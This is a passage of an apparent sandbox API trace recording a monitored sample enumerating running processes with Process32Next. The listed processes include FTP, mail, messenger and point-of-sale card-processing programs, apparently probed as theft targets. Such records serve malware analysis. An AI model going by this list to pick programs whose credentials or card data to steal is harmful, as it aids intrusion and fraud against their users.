pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.362] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0162.365] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0162.369] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0162.373] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0162.375] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.378] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0162.380] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0162.382] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0162.383] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0162.385] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0162.454] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0162.456] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.458] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0162.459] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0162.461] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0162.463] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0162.465] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.467] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0162.468] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0162.470] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0162.472] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0162.474] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0162.476] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0162.477] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0162.479] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0162.481] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0162.482] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0162.484] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0162.486] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0162.487] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0162.489] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0162.537] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0162.540] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0162.542] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0162.544] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0162.557] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0162.559] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0162.562] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0162.564] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0162.566] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0162.570] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0162.573] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0162.575] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0162.579] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0162.582] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0162.585] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0162.589] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0162.592] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0162.594] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0162.597] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0162.599] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0162.602] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0162.606] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0162.609] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0162.611] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0162.614] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0162.618] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0162.621] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0162.624] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0162.630] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0162.632] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0162.635] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0162.638] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0162.640] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0162.643] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0162.645] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0162.650] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0162.652] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0162.655] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0162.657] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0162.659] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0162.662] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0162.664] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0162.670] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0162.673] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0162.677] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0162.679] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0162.682] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0162.684] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0162.686] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0162.688] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0162.690] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0162.692] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0162.695] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0162.697] Process32Next (in: hSnapshot=0x1cec, 